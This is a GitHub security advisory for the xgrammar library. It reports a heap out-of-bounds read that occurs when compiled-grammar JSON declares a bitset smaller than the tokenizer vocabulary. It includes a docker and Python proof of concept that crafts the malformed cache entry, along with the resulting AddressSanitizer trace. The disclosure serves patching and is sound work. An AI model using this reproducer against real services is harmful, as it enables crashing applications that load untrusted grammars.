All advisories

Out-of-Bounds Read Through Mismatched Compiled Bitset Sizes

mlc-ai/xgrammar / GHSA-28vh-x3qg-488x

Affected packages

xgrammar pip
Affected versions>= 0.1.23
Patched versionsNot specified

Description

Out-of-Bounds Read Through Mismatched Compiled Bitset Sizes

Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730

Summary

An application that deserializes compiled-grammar JSON supplied or modified by an attacker can be crashed when it later generates a token mask. The compiled cache is allowed to contain an accepted_bitset whose logical size is smaller than the tokenizer vocabulary. For a 65-token tokenizer, the reproducer changes each cache entry to a self-consistent 32-bit, one-word bitset; fill_next_token_bitmask then treats it as a 65-bit, three-word source and reads past its heap allocation. This is an out-of-bounds read and process-availability issue; the evidence does not establish disclosure of the read bytes or code execution.

Compiled-grammar JSON deserialization, including this missing cross-field check, was introduced by commit 8d68545 and first released in v0.1.23. I inspected every release snapshot from v0.1.23 through v0.2.5, both v0.2.6 release candidates, and main revision f07ca3c; each accepts the mismatched size and contains no equivalent validation. v0.1.22 predates this deserializer, and no fixed release is present in the available history. I also checked the supplied AddressSanitizer transcript against revision f07ca3c and verified the source path statically; I did not repeat the expensive containerized sanitizer run while reviewing this report.

Detail

The root cause is a missing invariant at the compiled-grammar trust boundary. An adaptive cache entry with store_type == kAcceptedBitset represents token IDs, so its accepted_bitset.Size() must equal TokenizerInfo::GetVocabSize(). The serializer naturally emits that relationship because AdaptiveTokenMask constructs the bitset from the tokenizer vocabulary size, but the deserializer rebuilds the nested fields independently and never re-establishes it.

In cpp/support/dynamic_bitset.h, DeserializeJSONValue(DynamicBitset*, ...) checks only the bitset's internal encoding: the declared word count must equal ceil(size / 32), and the supplied words must fit in uint32_t. The malicious value [32, 1, 0] therefore passes: 32 logical bits genuinely require one word. Tokenizer metadata validation does not help because the attacker leaves that metadata unchanged; the inconsistency is between the accepted-bitset field and the separately supplied, legitimate 65-token TokenizerInfo.

cpp/compiled_grammar.cc::DeserializeJSONValue then accepts the adaptive cache without comparing these values. On revision f07ca3c it also ignores nested deserialization errors, which is the separate issue covered by report 17; this reproducer deliberately uses a structurally valid cache, so error propagation alone does not stop it. Likewise, report 03's bounds checks for accepted_indices, rejected_indices, and uncertain_indices do not cover the logical size of accepted_bitset.

GrammarMatcher::Impl allocates tmp_accepted_bitset_ with the tokenizer vocabulary size. During cpp/grammar_matcher.cc::FillBitmaskForStates, an entry marked kAcceptedBitset is combined as follows:

tmp_accepted_bitset_ |= adaptive_token_mask.accepted_bitset;

The destination is therefore 65 bits (three 32-bit words), while the attacker-controlled source is 32 bits (one word). DynamicBitset::operator|= loops over the destination's buffer_size_ and indexes the source with the same counter:

DynamicBitset& operator|=(const DynamicBitset& other) {
  XGRAMMAR_DCHECK(buffer_size_ <= other.buffer_size_);
  for (int i = 0; i < buffer_size_; ++i) {
    data_[i] |= other.data_[i];
  }
  return *this;
}

The check is an internal debug assertion, not input validation. With the repository's normal XGRAMMAR_ENABLE_INTERNAL_CHECK=OFF configuration, it is compiled out even for the CMake Debug build used by the reproducer. The loop reads other.data_[1] immediately after the one-word allocation and would attempt other.data_[2] if execution continued. AddressSanitizer stops at the first four-byte read. A larger-than-expected source is not the demonstrated path because the loop is bounded by the destination; exact equality is still the correct serialized invariant and avoids accepting semantically inconsistent caches.

The source-to-sink chain is therefore: attacker-controlled compiled JSON → internally valid 32-bit DynamicBitset → missing comparison with the 65-token TokenizerInfo → cache entry restored as kAcceptedBitset → three-word matcher destination ORed with a one-word source → heap out-of-bounds read. The attacker must be able to influence compiled-grammar JSON that the application deserializes. The Python API does not fetch or deserialize such data by itself, so deployments that only use locally compiled, unmodified objects do not expose this input boundary.

Reproduce

Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.

The following disposable container pins the assessed revision instead of cloning a moving branch. It compiles XGrammar with AddressSanitizer, creates a legitimate compiled grammar for a 65-token vocabulary, and then changes only the adaptive masks to the valid one-word encoding [32, 1, 0]. Updating every cache entry avoids relying on unordered_map serialization order. On the vulnerable revision, deserialization succeeds and the first mask-generation call reaches the out-of-bounds read. The container is removed automatically; expect the final Python process to abort.

docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --depth 1
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
  python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
tee repro.py >/dev/null <<'PY'
import json
import xgrammar as xgr

tokenizer = xgr.TokenizerInfo([f"token{i}" for i in range(65)])
compiler = xgr.GrammarCompiler(tokenizer, max_threads=1, cache_enabled=False)
obj = json.loads(compiler.compile_grammar('root ::= "a"').serialize_json())
for _, mask in obj["adaptive_token_mask_cache"]:
    mask.update(store_type=2, accepted_bitset=[32, 1, 0])
compiled = xgr.CompiledGrammar.deserialize_json(json.dumps(obj), tokenizer)
matcher = xgr.GrammarMatcher(compiled)
matcher.fill_next_token_bitmask(xgr.allocate_token_bitmask(1, tokenizer.vocab_size))
PY
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$(g++ -print-file-name=libasan.so)" \
python repro.py
DOCKER

The supplied run produced the following essential frames. Local checkout and interpreter prefixes have been omitted from this excerpt; the repository-relative source locations and offsets are unchanged.

ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4
    #0 xgrammar::DynamicBitset::operator|=(...) cpp/support/dynamic_bitset.h:161
    #1 xgrammar::GrammarMatcher::Impl::FillBitmaskForStates(...) cpp/grammar_matcher.cc:1877
    #2 xgrammar::GrammarMatcher::Impl::FillNextTokenBitmask(...) cpp/grammar_matcher.cc:1700

0 bytes to the right of 4-byte region
allocated by thread T0 here:
    #6 xgrammar::DynamicBitset::DynamicBitset(int, unsigned int*) cpp/support/dynamic_bitset.h:58
    #7 xgrammar::DeserializeJSONValue(xgrammar::DynamicBitset*, ...)

SUMMARY: AddressSanitizer: heap-buffer-overflow in xgrammar::DynamicBitset::operator|=(...)
ABORTING

Credit

Zheng Yu @ Depthfirst